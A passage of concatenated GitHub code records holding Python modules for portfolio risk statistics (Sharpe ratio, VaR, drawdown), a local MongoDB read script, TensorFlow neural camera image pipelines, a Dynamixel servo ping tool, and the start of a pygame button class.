We should infer the periods per year\n but that is currently left as an exercise\n to the reader :-)\n \"\"\"\n return r.std()*(periods_per_year**0.5)\n\n\ndef sharpe_ratio(r, riskfree_rate, periods_per_year):\n \"\"\"\n Computes the annualized sharpe ratio of a set of returns\n \"\"\"\n # convert the annual riskfree rate to per period\n rf_per_period = (1+riskfree_rate)**(1/periods_per_year)-1\n excess_ret = r - rf_per_period\n ann_ex_ret = annualize_rets(excess_ret, periods_per_year)\n ann_vol = annualize_vol(r, periods_per_year)\n return ann_ex_ret/ann_vol\n\nimport scipy.stats\ndef is_normal(r, level=0.01):\n \"\"\"\n Applies the Jarque-Bera test to determine if a Series is normal or not\n Test is applied at the 1% level by default\n Returns True if the hypothesis of normality is accepted, False otherwise\n \"\"\"\n if isinstance(r, pd.DataFrame):\n return r.aggregate(is_normal)\n else:\n statistic, p_value = scipy.stats.jarque_bera(r)\n return p_value > level\n \ndef drawdown(return_series: pd.Series):\n \"\"\"Takes a time series of asset returns.\n returns a DataFrame with columns for\n the wealth index, \n the previous peaks, and \n the percentage drawdown\n \"\"\"\n wealth_index = 1000*(1+return_series).cumprod()\n previous_peaks = wealth_index.cummax()\n drawdowns = (wealth_index 
- previous_peaks)/previous_peaks\n    return pd.DataFrame({\"Wealth\": wealth_index, \n                         \"Previous Peak\": previous_peaks, \n                         \"Drawdown\": drawdowns})\ndef semideviation(r):\n    \"\"\"\n    Returns the semideviation aka negative semideviation of r\n    r must be a Series or a DataFrame, else raises a TypeError\n    \"\"\"\n    if isinstance(r, pd.Series):\n        is_negative = r < 0\n        return r[is_negative].std(ddof=0)\n    elif isinstance(r, pd.DataFrame):\n        return r.aggregate(semideviation)\n    else:\n        raise TypeError(\"Expected r to be a Series or DataFrame\")\n\n\ndef var_historic(r, level=5):\n    \"\"\"\n    Returns the historic Value at Risk at a specified level\n    i.e. returns the number such that \"level\" percent of the returns\n    fall below that number, and the (100-level) percent are above\n    \"\"\"\n    if isinstance(r, pd.DataFrame):\n        return r.aggregate(var_historic, level=level)\n    elif isinstance(r, pd.Series):\n        return -np.percentile(r, level)\n    else:\n        raise TypeError(\"Expected r to be a Series or DataFrame\")\n\n\ndef cvar_historic(r, level=5):\n    \"\"\"\n    Computes the Conditional VaR of Series or DataFrame\n    \"\"\"\n    if isinstance(r, pd.Series):\n        is_beyond = r <= var_historic(r, level=level)\n        return -r[is_beyond].mean()\n    elif isinstance(r, pd.DataFrame):\n        return r.aggregate(cvar_historic, level=level)\n    else:\n        raise TypeError(\"Expected r to be a Series or DataFrame\")\n\n\nfrom scipy.stats import norm\ndef var_gaussian(r, level=5, modified=False):\n    \"\"\"\n    Returns the Parametric Gaussian VaR of a Series or DataFrame\n    If \"modified\" is True, then the modified VaR is returned,\n    using the Cornish-Fisher modification\n    \"\"\"\n    # compute the Z score assuming it was Gaussian\n    z = norm.ppf(level/100)\n    if modified:\n        # modify the Z score based on observed skewness and kurtosis\n        s = skewness(r)\n        k = kurtosis(r)\n        z = (z +\n                (z**2 - 1)*s/6 +\n                (z**3 -3*z)*(k-3)/24 -\n                (2*z**3 - 5*z)*(s**2)/36\n            )\n    return -(r.mean() + z*r.std(ddof=0))\ndef summary_stats(r, riskfree_rate=0.03):\n    \"\"\"\n    Return a DataFrame that contains aggregated summary stats for the returns in the columns of r\n    \"\"\"\n    ann_r = r.aggregate(annualize_rets, periods_per_year=12)\n    ann_vol = r.aggregate(annualize_vol, periods_per_year=12)\n    ann_sr = r.aggregate(sharpe_ratio, riskfree_rate=riskfree_rate, periods_per_year=12)\n    dd = r.aggregate(lambda r: drawdown(r).Drawdown.min())\n    skew = r.aggregate(skewness)\n    kurt = r.aggregate(kurtosis)\n    cf_var5 = r.aggregate(var_gaussian, modified=True)\n    hist_cvar5 = r.aggregate(cvar_historic)\n    return pd.DataFrame({\n        \"Annualized Return\": ann_r,\n        \"Annualized Vol\": ann_vol,\n        \"Skewness\": skew,\n        \"Kurtosis\": kurt,\n        \"Cornish-Fisher VaR (5%)\": cf_var5,\n        \"Historic CVaR (5%)\": hist_cvar5,\n        \"Sharpe Ratio\": ann_sr,\n        \"Max Drawdown\": dd\n    })","repo_name":"rishubhkhurana/MLFinance","sub_path":"erktoolkit/erk/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"14117527497","text":"from pymongo import MongoClient\n\ndef main():\n\n    # Connection to the MongoDB Server\n    mongoClient = MongoClient('127.0.0.1:27017')\n    # Connection to the database\n    db = mongoClient.data_visual\n    #Collection\n    collection = db.Oil_Production\n\n    Oil_Production_JSON = list(collection.find())\n\n    print(Oil_Production_JSON)\n\nif __name__ == \"__main__\":\n    main
()\n","repo_name":"Matthew-Jeffery/Web-Class-Projects","sub_path":"flaskr/mongo_read.py","file_name":"mongo_read.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4143268239","text":"# -*- coding: utf-8 -*-\n\"\"\"\nImplementation of classic and neural image signal processors. The module provides:\n\n- an abstract NIPModel class that sets up a common framework for ISP models\n- Several neural ISPs: INet, DNet, UNet\n- A trivial ONet model which serves as a NULL-ISP (allows to pass RGB-RGB pairs through the pipeline),\n- A ClassicISP class with a standard ISP (standard steps + neural demosaicing)\n\n\"\"\"\nimport os\nimport sys\nimport json\nimport inspect\nimport numpy as np\nimport tensorflow as tf\n\nfrom collections import OrderedDict\n\nimport helpers.raw\nfrom models.tfmodel import TFModel\nfrom models import layers\nfrom helpers import tf_helpers, paramspec, utils\nfrom helpers.kernels import upsampling_kernel, gamma_kernels, bilin_kernel\n\n\nclass NIPModel(TFModel):\n \"\"\"\n Abstract class for implementing neural imaging pipelines. Specific classes are expected to \n implement the 'construct_model' method that builds the model. See existing classes for examples.\n \"\"\"\n\n def __init__(self, loss_metric='L2', patch_size=None, in_channels=4, **kwargs):\n \"\"\"\n Base constructor with common setup.\n\n :param loss_metric: loss metric for NIP optimization (L2, L1, SSIM)\n :param patch_size: Optionally patch size can be given to fix placeholder dimensions (can be None)\n :param in_channels: number of channels in the input RAW image (defaults to 4 for RGGB)\n :param kwargs: Additional arguments for specific NIP implementations\n \"\"\"\n super().__init__()\n self.x = tf.keras.Input(dtype=tf.float32, shape=(patch_size, patch_size, in_channels), name='x')\n self.in_channels = in_channels\n self.construct_model(**kwargs)\n self._has_attributes(['y', '_model'])\n\n # Configure loss and model optimization\n self.loss_metric = loss_metric\n self.construct_loss(loss_metric)\n self.optimizer = tf.keras.optimizers.Adam()\n\n def construct_loss(self, loss_metric):\n if loss_metric == 'L2':\n self.loss = tf_helpers.mse \n elif loss_metric == 'L1':\n self.loss = tf_helpers.mae\n elif loss_metric == 'SSIM':\n self.loss = tf_helpers.ssim_loss\n elif loss_metric == 'MS-SSIM':\n self.loss = tf_helpers.msssim_loss\n else:\n raise ValueError('Unsupported loss metric!')\n\n def construct_model(self):\n \"\"\"\n Constructs the NIP model. The model should be a tf.keras.Model instance available via the\n self._model attribute. The method should use self.x as RAW image input, and set self.y as \n the model output. The output is expected to be clipped to [0,1]. 
For better optimization \n stability, it's better not to backpropagate through clipping:\n\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y])\n \"\"\"\n raise NotImplementedError()\n\n @tf.function\n def training_step(self, batch_x, batch_y, learning_rate=None):\n \"\"\"\n Make a single training step and return the loss.\n \"\"\"\n with tf.GradientTape() as tape:\n batch_Y = self._model(batch_x)\n loss = self.loss(batch_Y, batch_y)\n\n if learning_rate is not None: self.optimizer.lr.assign(learning_rate)\n grads = tape.gradient(loss, self._model.trainable_weights)\n self.optimizer.apply_gradients(zip(grads, self._model.trainable_weights))\n\n return loss\n \n def process(self, batch_x, training=False):\n \"\"\"\n Develop RAW input and return RGB image.\n \"\"\"\n if batch_x.ndim == 3:\n batch_x = np.expand_dims(batch_x, 0)\n \n return self._model(batch_x, training)\n \n def reset_performance_stats(self):\n self.performance = {\n 'loss': {'training': [], 'validation': []},\n 'psnr': {'validation': []},\n 'ssim': {'validation': []},\n }\n\n def get_hyperparameters(self):\n p = {'in_channels': self.in_channels}\n if hasattr(self, '_h'):\n p.update(self._h.to_json())\n return p\n\n @property\n def _input_description(self):\n return utils.format_patch_shape(self.patch_size_raw)\n\n @property\n def _output_description(self):\n return utils.format_patch_shape(self.patch_size_rgb)\n\n @property\n def patch_size_raw(self):\n return self.x.shape[1:] if hasattr(self.y, 'shape') else None\n\n @property\n def patch_size_rgb(self):\n return self.y.shape[1:] if hasattr(self.y, 'shape') else None\n\n def summary(self):\n return '{:s} : {} -> {}'.format(super().summary(), self._input_description, self._output_description)\n\n def load_model(self, dirname):\n if '/' not in dirname:\n dirname = os.path.join('data/models/nip', dirname)\n super().load_model(dirname)\n\n def save_model(self, dirname, epoch=0, quiet=False):\n if '/' not in dirname:\n dirname = os.path.join('data/models/nip', dirname)\n super().save_model(dirname, epoch=epoch, quiet=quiet)\n\n def process_fingerprint(self, k0, demosaicing=True, cfa_pattern=None):\n \"\"\" \n Map a RAW-level camera fingerprint to RGB space either via (1) CFA-informed pixel mapping or (2) demosaicing.\n \n (2) will be more suitable for standard PRNU detection, while (1) may be more applicable for further processing,\n e.g., in CNN-based models. \n \"\"\"\n \n try:\n default_cfa = self._h.cfa_pattern\n except:\n default_cfa = None\n\n cfa_pattern = cfa_pattern or default_cfa\n\n if cfa_pattern is None:\n raise ValueError('This ISP is not aware of the CFA! 
Set the CFA explicitly or make sure \"._h.cfa_pattern\" is accessible!')\n\n k0m = helpers.raw.merge_bayer(k0, cfa_pattern)\n \n if demosaicing:\n return self._model._demosaicing(np.expand_dims(k0m, axis=0), clip=False).numpy()\n else:\n return k0m.sum(-1)\n\n\nclass UNet(NIPModel):\n \"\"\"\n The UNet model, rewritten from scratch for TF 2.x\n Originally adapted from https://github.com/cchen156/Learning-to-See-in-the-Dark\n \"\"\"\n \n def construct_model(self, **kwargs):\n # Define and validate hyper-parameters\n self._h = paramspec.ParamSpec({\n 'n_steps': (5, int, (2, 6)),\n 'activation': ('leaky_relu', str, set(tf_helpers.activation_mapping.keys()))\n })\n\n self._h.update(**kwargs)\n lrelu = tf_helpers.activation_mapping[self._h.activation]\n \n _layers = OrderedDict()\n _tensors = OrderedDict()\n _tensors['ep0'] = self.x\n\n # Construct the encoder\n for n in range(1, self._h.n_steps + 1):\n _layers['ec{}1'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(n-1), [3, 3], activation=lrelu, padding='SAME')\n _layers['ec{}2'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(n-1), [3, 3], activation=lrelu, padding='SAME')\n _tensors['ec{}1'.format(n)] = _layers['ec{}1'.format(n)](_tensors['ep{}'.format(n-1)])\n _tensors['ec{}2'.format(n)] = _layers['ec{}2'.format(n)](_tensors['ec{}1'.format(n)])\n\n if n < self._h.n_steps:\n _layers['ep{}'.format(n)] = tf.keras.layers.MaxPool2D([2, 2], padding='SAME')\n _tensors['ep{}'.format(n)] = _layers['ep{}'.format(n)](_tensors['ec{}2'.format(n)])\n \n # Easy access to encoder output via a recursive relation\n _tensors['dc02'] = _tensors['ec{}2'.format(self._h.n_steps)]\n\n # Construct the decoder\n for n in range(1, self._h.n_steps):\n _layers['dct{}'.format(n)] = tf.keras.layers.Conv2DTranspose(32 * 2**(self._h.n_steps - n - 1), [2, 2], [2, 2], padding='SAME')\n _layers['dcat{}'.format(n)] = tf.keras.layers.Concatenate()\n _layers['dc{}1'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(self._h.n_steps - n - 1), [3, 3], activation=lrelu, padding='SAME')\n _layers['dc{}2'.format(n)] = tf.keras.layers.Conv2D(32 * 2**(self._h.n_steps - n - 1), [3, 3], activation=lrelu, padding='SAME')\n\n _tensors['dct{}'.format(n)] = _layers['dct{}'.format(n)](_tensors['dc{}2'.format(n-1)])\n _tensors['dcat{}'.format(n)] = _layers['dcat{}'.format(n)]([_tensors['dct{}'.format(n)], _tensors['ec{}2'.format(self._h.n_steps - n)]])\n _tensors['dc{}1'.format(n)] = _layers['dc{}1'.format(n)](_tensors['dcat{}'.format(n)])\n _tensors['dc{}2'.format(n)] = _layers['dc{}2'.format(n)](_tensors['dc{}1'.format(n)])\n\n # Final step to render the RGB image\n _layers['dc{}'.format(self._h.n_steps)] = tf.keras.layers.Conv2D(12, [3, 3], padding='SAME')\n _tensors['dc{}'.format(self._h.n_steps)] =_layers['dc{}'.format(self._h.n_steps)](_tensors['dc{}2'.format(self._h.n_steps - 1)])\n _tensors['dts'] = tf.nn.depth_to_space(_tensors['dc{}'.format(self._h.n_steps)], 2)\n\n # Add NIP outputs\n y = _tensors['dts']\n # self.y = tf.clip_by_value(_tensors['dts'], 0, 1)\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n\n # Construct the Keras model\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y], name='unet')\n\n @property\n def model_code(self):\n return f'{self.class_name}_{self._h.n_steps}'\n\n\nclass INet(NIPModel):\n \"\"\"\n A neural pipeline which replicates the steps of a standard imaging pipeline.\n \"\"\"\n \n def construct_model(self, random_init=False, kernel=5, trainable_upsampling=False, cfa_pattern='gbrg'):\n \n self._h = paramspec.ParamSpec({\n 'random_init': 
(False, bool, None),\n 'kernel': (5, int, (3, 11)),\n 'trainable_upsampling': (False, bool, None),\n 'cfa_pattern': ('gbrg', str, {'gbrg', 'rggb', 'bggr'})\n })\n params = locals()\n self._h.update(**{k: params[k] for k in self._h.keys() if k in params})\n\n # Initialize the upsampling kernel\n upk = upsampling_kernel(self._h.cfa_pattern)\n\n if self._h.random_init:\n # upk = np.random.normal(0, 0.1, (4, 12))\n dmf = np.random.normal(0, 0.1, (self._h.kernel, self._h.kernel, 3, 3))\n gamma_d1k = np.random.normal(0, 0.1, (3, 12))\n gamma_d1b = np.zeros((12, ))\n gamma_d2k = np.random.normal(0, 0.1, (12, 3))\n gamma_d2b = np.zeros((3,))\n srgbk = np.eye(3)\n else: \n # Prepare demosaicing kernels (bilinear)\n dmf = bilin_kernel(self._h.kernel)\n\n # Prepare gamma correction kernels (obtained from a pre-trained toy model)\n gamma_d1k, gamma_d1b, gamma_d2k, gamma_d2b = gamma_kernels()\n\n # Example sRGB conversion table\n srgbk = np.array([[ 1.82691061, -0.65497452, -0.17193617],\n [-0.00683982, 1.33216381, -0.32532394],\n [ 0.06269717, -0.40055895, 1.33786178]]).transpose()\n\n # Up-sample the input back the full resolution\n h12 = tf.keras.layers.Conv2D(12, 1, kernel_initializer=tf.constant_initializer(upk), use_bias=False, activation=None, trainable=self._h.trainable_upsampling)(self.x)\n\n # Demosaicing\n pad = (self._h.kernel - 1) // 2\n bayer = tf.nn.depth_to_space(h12, 2)\n bayer = tf.pad(bayer, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n rgb = tf.keras.layers.Conv2D(3, self._h.kernel, kernel_initializer=tf.constant_initializer(dmf), use_bias=False, activation=None, padding='VALID')(bayer)\n\n # Color space conversion\n srgb = tf.keras.layers.Conv2D(3, 1, kernel_initializer=tf.constant_initializer(srgbk), use_bias=False, activation=None)(rgb,)\n\n # Gamma correction\n rgb_g0 = tf.keras.layers.Conv2D(12, 1, kernel_initializer=tf.constant_initializer(gamma_d1k), bias_initializer=tf.constant_initializer(gamma_d1b), use_bias=True, activation=tf.keras.activations.tanh)(srgb)\n y = tf.keras.layers.Conv2D(3, 1, kernel_initializer=tf.constant_initializer(gamma_d2k), bias_initializer=tf.constant_initializer(gamma_d2b), use_bias=True, activation=None)(rgb_g0)\n \n # self.y = tf.clip_by_value(self.yy, 0, 1, name='{}/y'.format(self.scoped_name))\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y])\n\n @property\n def model_code(self):\n return '{c}_{cfa}{tu}{r}_{k}x{k}'.format(c=self.class_name, cfa=self._h.cfa_pattern, k=self._h.kernel, \n tu='T' if self._h.trainable_upsampling else '', r='R' if self._h.random_init else '')\n\n\nclass DNet(NIPModel):\n \"\"\"\n Neural imaging pipeline adapted from a joint demosaicing-&-denoising model:\n Gharbi, Michaël, et al. 
\"Deep joint demosaicking and denoising.\" ACM Transactions on Graphics (TOG) 35.6 (2016): 191.\n \"\"\"\n\n def construct_model(self, n_layers=15, kernel=3, n_features=64):\n\n self._h = paramspec.ParamSpec({\n 'n_layers': (15, int, (1, 32)),\n 'kernel': (3, int, (3, 11)),\n 'n_features': (64, int, (4, 128)),\n })\n params = locals()\n self._h.update(**{k: params[k] for k in self._h.keys() if k in params})\n\n k_initializer = tf.keras.initializers.VarianceScaling\n\n # Initialize the upsampling kernel\n upk = upsampling_kernel()\n\n # Padding size\n pad = (self._h.kernel - 1) // 2\n\n # Convolutions on the sub-sampled input tensor\n deep_x = self.x\n for r in range(self._h.n_layers):\n deep_y = tf.keras.layers.Conv2D(12 if r == self._h.n_layers - 1 else self._h.n_features, self._h.kernel, activation=tf.keras.activations.relu, padding='VALID', kernel_initializer=k_initializer)(deep_x)\n deep_x = tf.pad(deep_y, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n\n # Up-sample the input\n h12 = tf.keras.layers.Conv2D(12, 1, kernel_initializer=tf.constant_initializer(upk), use_bias=False, activation=None, trainable=False)(self.x)\n bayer = tf.nn.depth_to_space(h12, 2)\n\n # Upscale the conv. features and concatenate with the input RGB channels\n features = tf.nn.depth_to_space(deep_x, 2)\n bayer_features = tf.concat((features, bayer), axis=3) \n\n # Project the concatenated 6-D features (R G B bayer from input + 3 channels from convolutions)\n pu = tf.keras.layers.Conv2D(self._h.n_features, self._h.kernel, kernel_initializer=k_initializer, use_bias=True, activation=tf.keras.activations.relu, padding='VALID', bias_initializer=tf.zeros_initializer)(bayer_features)\n\n # Final 1x1 conv to project each 64-D feature vector into the RGB colorspace\n pu = tf.pad(pu, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n\n y = tf.keras.layers.Conv2D(3, 1, kernel_initializer=tf.ones_initializer, use_bias=False, activation=None, padding='VALID')(pu)\n # self.y = tf.clip_by_value(self.yy, 0, 1, name='{}/y'.format(self.scoped_name))\n self.y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n self._model = tf.keras.Model(inputs=[self.x], outputs=[self.y])\n\n @property\n def model_code(self):\n return '{c}_{k}x{k}_{l}x{f}f'.format(c=self.class_name, k=self._h.kernel, \n f=self._h.n_features, l=self._h.n_layers)\n\n\nclass ONet(NIPModel):\n \"\"\"\n Dummy pipeline for RGB training.\n \"\"\"\n\n def construct_model(self):\n patch_size = 2 * self.x.shape[1]\n self.x = tf.keras.Input(dtype=tf.float32, shape=(patch_size, patch_size, 3))\n self.y = tf.identity(self.x)\n self._model = tf.keras.Model(inputs=self.x, outputs=self.y)\n\n\nclass __TensorISP():\n \"\"\" \n Toy ISP implemented in Tensorflow. 
This class is intended for debugging and testing - for\n use in most situations, please use a more flexible 'ClassicISP' which integrates with \n the rest of the framework.\n \"\"\"\n\n def process(self, x, srgb_mat=None, cfa_pattern='gbrg', brightness='percentile'):\n\n kernel = 5\n\n # Initialize upsampling and demosaicing kernels\n upk = upsampling_kernel(cfa_pattern).reshape((1, 1, 4, 12))\n dmf = bilin_kernel(kernel)\n\n # Setup sRGB color conversion\n if srgb_mat is None:\n srgb_mat = np.eye(3)\n srgb_mat = srgb_mat.T.reshape((1, 1, 3, 3))\n\n # Demosaicing & color space conversion\n pad = (kernel - 1) // 2\n h12 = tf.nn.conv2d(x, upk, [1, 1, 1, 1], 'SAME')\n bayer = tf.nn.depth_to_space(h12, 2)\n bayer = tf.pad(bayer, tf.constant([[0, 0], [pad, pad], [pad, pad], [0, 0]]), 'REFLECT')\n rgb = tf.nn.conv2d(bayer, dmf, [1, 1, 1, 1], 'VALID')\n \n # RGB -> sRGB\n rgb = tf.nn.conv2d(rgb, srgb_mat, [1, 1, 1, 1], 'SAME')\n\n # Brightness correction\n if brightness is not None:\n if brightness == 'percentile':\n percentile = 0.5\n rgb -= np.percentile(rgb, percentile)\n rgb /= np.percentile(rgb, 100 - percentile)\n elif brightness == 'shift':\n mult = 0.25 / tf.reduce_mean(rgb)\n rgb *= mult\n else:\n raise ValueError('Brightness normalization not recognized!')\n\n # Gamma correction\n y = rgb\n y = tf.stop_gradient(tf.clip_by_value(y, 0, 1) - y) + y\n y = tf.pow(y, 1/2.2)\n \n return y\n\n\nclass _ClassicISP(tf.keras.Model):\n \"\"\"\n A flexible version of a classic camera ISP.\n \"\"\"\n\n def __init__(self, srgb_mat=None, kernel=5, c_filters=(3,), cfa_pattern='gbrg', residual=False, brightness=None, **kwargs):\n super().__init__()\n \n up = upsampling_kernel(cfa_pattern).reshape((1, 1, 4, 12)).astype(np.float32)\n self._upsampling_kernel = tf.convert_to_tensor(up)\n\n if srgb_mat is None:\n srgb_mat = np.eye(3, dtype=np.float32)\n\n self._srgb_mat = tf.convert_to_tensor(srgb_mat.T.reshape((1, 1, 3, 3)))\n self._demosaicing = layers.DemosaicingLayer(c_filters, kernel, 'leaky_relu', residual)\n self._brightness = brightness\n\n def call(self, inputs, training=False):\n h12 = tf.nn.conv2d(inputs, self._upsampling_kernel, [1, 1, 1, 1], 'SAME')\n bayer = tf.nn.depth_to_space(h12, 2)\n\n rgb = self._demosaicing(bayer)\n rgb = tf.nn.conv2d(rgb, self._srgb_mat, [1, 1, 1, 1], 'SAME')\n\n # Brightness correction\n if self._brightness == 'percentile':\n percentile = 0.5\n rgb -= np.percentile(rgb, percentile)\n rgb /= np.percentile(rgb, 100 - percentile)\n elif self._brightness == 'shift':\n mult = 0.25 / tf.reduce_mean(rgb)\n rgb *= mult\n \n # Gamma correction\n y = rgb\n y = tf.stop_gradient(tf.clip_by_value(y, 1.0/255, 1) - y) + y\n y = tf.pow(y, 1/2.2)\n return y\n\n\nclass ClassicISP(NIPModel):\n \"\"\"\n A tensorflow implementation of a simple camera ISP. 
The model expects RAW Bayer stacks\n    with 4 channels (RGGB) as input, and replicates steps of a simple pipeline:\n\n    - upsample half-resolution RGGB stacks to full-resolution RGB Bayer images\n    - demosaicing (simple CNN model)\n    - RGB -> sRGB color conversion (based on conversion tables from the camera)\n    - [optional brightness normalization]\n    - gamma correction\n\n    See also: helpers.raw_api.unpack\n    \"\"\"\n\n    def construct_model(self, srgb_mat=None, kernel=5, c_filters=(), cfa_pattern='gbrg', residual=True, brightness=None):\n        \n        self._h = paramspec.ParamSpec({\n            'kernel': (5, int, (3, 11)),\n            'c_filters': ((), tuple, paramspec.numbers_in_range(int, 1, 1024)),\n            'cfa_pattern': ('gbrg', str, {'gbrg', 'rggb', 'bggr'}),\n            'residual': (True, bool, None)\n        })\n        params = locals()\n        self._h.update(**{k: params[k] for k in self._h.keys() if k in params})\n        self._model = _ClassicISP(**self._h.to_dict())\n        self.y = None\n\n    def set_cfa_pattern(self, cfa_pattern):\n        if cfa_pattern is not None:\n            cfa_pattern = cfa_pattern.lower()\n            up = upsampling_kernel(cfa_pattern).reshape((1, 1, 4, 12)).astype(np.float32)\n            self._model._upsampling_kernel = tf.convert_to_tensor(up)\n            self._h.update(cfa_pattern=cfa_pattern)\n\n    def set_srgb_conversion(self, srgb_mat):\n        if srgb_mat is not None:\n            srgb = srgb_mat.T.reshape((1, 1, 3, 3)).astype(np.float32)\n            self._model._srgb_mat = tf.convert_to_tensor(srgb)\n\n    def process(self, batch_x, training=False, cfa_pattern=None, srgb_mat=None):\n        if batch_x.ndim == 3:\n            batch_x = np.expand_dims(batch_x, 0)\n\n        self.set_cfa_pattern(cfa_pattern)\n        self.set_srgb_conversion(srgb_mat)\n        return self._model(batch_x, training)\n\n    @property\n    def model_code(self):\n        return 'ClassicISP_{cfa}_{k}x{k}_{fs}-{of}{r}'.format(fs='-'.join(['{:d}'.format(x) for x in self._h.c_filters]), of=3, k=self._h.kernel, cfa=self._h.cfa_pattern, r='R' if self._h.residual else '')\n\n    def set_camera(self, camera):\n        \"\"\" Sets both CFA and sRGB based on camera presets from 'config/cameras.json' \"\"\"\n        with open('config/cameras.json') as f:\n            cameras = json.load(f)\n        self.set_cfa_pattern(cameras[camera]['cfa'])\n        self.set_srgb_conversion(np.array(cameras[camera]['srgb']))\n\n    @classmethod\n    def restore(cls, dir_name='data/models/isp/ClassicISP_auto_3x3_32-32-32-32-3R/', *, camera=None, cfa=None, srgb=None, patch_size=128):\n        isp = super().restore(dir_name)\n\n        if camera is not None:\n            isp.set_camera(camera)\n\n        if cfa is not None:\n            isp.set_cfa_pattern(cfa)\n\n        if srgb is not None:\n            isp.set_srgb_conversion(srgb)\n        \n        return isp\n\n    def summary(self):\n        nf = len(self._h.c_filters)\n        fs = self._h.c_filters[0] if len(set(self._h.c_filters)) == 1 else '*' \n        k = self._h.kernel\n        return f'{self.class_name}[{self._h.cfa_pattern}] + CNN demosaicing [{nf}+1 layers : {k}x{k}x{fs} -> 1x1x3]'\n\n    def summary_compact(self):\n        nf = len(self._h.c_filters)\n        fs = self._h.c_filters[0] if len(set(self._h.c_filters)) == 1 else '*' \n        k = self._h.kernel\n        return f'{self.class_name}[{self._h.cfa_pattern}, {nf}+1 conv2D {k}x{k}x{fs} > 1x1x3]'\n\n\nsupported_models = [name for name, obj in inspect.getmembers(sys.modules[__name__]) if type(obj) is type and issubclass(obj, NIPModel) and name != 'NIPModel']\n","repo_name":"pkorus/neural-imaging","sub_path":"models/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":22758,"program_lang":"python","lang":"en","doc_type":"code","stars":151,"dataset":"github-code","pt":"5"} +{"seq_id":"40526957475","text":"from __future__ import print_function\nfrom 
pyxl320.Packet import makePingPacket\nfrom pyxl320 import ServoSerial\n# from pyxl320 import DummySerial\nfrom pyxl320 import utils\nimport argparse\nimport time\nfrom pyxl320 import xl320\nfrom pyxl320.xl320 import ErrorStatusMsg\nfrom serial import SerialException\nimport sys\n\n\ndef packetToDict(pkt):\n\t\"\"\"\n\tGiven a packet, this turns it into a dictionary ... is this useful?\n\n\tin: packet, array of numbers\n\tout: dictionary (key, value)\n\t\"\"\"\n\n\td = {\n\t\t'id': pkt[4],\n\t\t# 'instruction': xl320.InstrToStr[pkt[7]],\n\t\t# 'length': (pkt[6] << 8) + pkt[5],\n\t\t# 'params': pkt[8:-2],\n\t\t'Model Number': (pkt[10] << 8) + pkt[9],\n\t\t'Firmware Ver': pkt[11],\n\t\t'Error': ErrorStatusMsg[pkt[8]],\n\t\t# 'crc': pkt[-2:]\n\t}\n\n\treturn d\n\n\ndef sweep(port, rate, ID, retry=3):\n\t\"\"\"\n\tSends a ping packet to IDs from 0 to maximum and prints out any returned\n\tmessages.\n\n\tActually sends a broadcast and will retry (resend) the ping 3 times ...\n\t\"\"\"\n\tif port == 'dummy':\n\t\ts = ServoSerial(port, rate, fake=True)\n\telse:\n\t\ts = ServoSerial(port, rate)\n\n\tif ID < 0:\n\t\tID = xl320.XL320_BROADCAST_ADDR\n\n\ttry:\n\t\ts.open()\n\texcept SerialException as e:\n\t\t# print('Error opening serial port:')\n\t\tprint('-'*40)\n\t\tprint(sys.argv[0], ':')\n\t\tprint(e)\n\t\texit(1)\n\n\tpkt = makePingPacket(ID)\n\t# print('ping', pkt)\n\ts.write(pkt)\n\n\t# as more servos add up, I might need to increase the cnt number???\n\tfor cnt in range(retry):\n\t\tans = s.read()\n\n\t\tif ans:\n\t\t\tfor pkt in ans:\n\t\t\t\tservo = packetToDict(pkt)\n\t\t\t\tutils.prettyPrintPacket(servo)\n\t\t\t\tprint('raw pkt: {}'.format(pkt))\n\t\telse:\n\t\t\tprint('Try {}: no servos found'.format(cnt))\n\n\t\ttime.sleep(0.1)\n\n\ts.close()\n\n\nDESCRIPTION = \"\"\"\nSends out a ping packet and prints all of the returned packets. If you don't\nspecify a specific id number, the program defaults to 'all'.\n\nExample:\n\n./servo_ping.py /dev/tty.usbserial-AL034G2K\nFinding all servos:\nOpened /dev/tty.usbserial-AL034G2K @ 1000000\n---------------------------------------\nid........................... 1\nFirmware Ver................. 29\nModel Number................. 350\nError........................ None\nraw pkt: [255, 255, 253, 0, 1, 7, 0, 85, 0, 94, 1, 29, 31, 71]\n---------------------------------------\nid........................... 2\nFirmware Ver................. 29\nModel Number................. 350\nError........................ 
None\nraw pkt: [255, 255, 253, 0, 2, 7, 0, 85, 0, 94, 1, 29, 21, 119]\n\"\"\"\n\n\ndef handleArgs():\n\tparser = argparse.ArgumentParser(description=DESCRIPTION, formatter_class=argparse.RawTextHelpFormatter)\n\t# parser.add_argument('-m', '--max', help='max id', type=int, default=253)\n\tparser.add_argument('-r', '--rate', help='servo baud rate', type=int, default=1000000)\n\tparser.add_argument('-i', '--id', help='ping servo ID', type=int, default=-1)\n\tparser.add_argument('port', help='serial port name, set to \"dummy\" for testing', type=str)\n\n\targs = vars(parser.parse_args())\n\treturn args\n\n\nif __name__ == '__main__':\n\targs = handleArgs()\n\tprint('Finding all servos:')\n\tsweep(port=args['port'], rate=args['rate'], ID=args['id'])\n","repo_name":"MultipedRobotics/pyxl320","sub_path":"bin/servo_ping.py","file_name":"servo_ping.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"14490872404","text":"import pygame as pg\nfrom game_data import button_images, audio_paths\n\nclass Button(pg.sprite.Sprite):\n\tdef __init__(self, name, 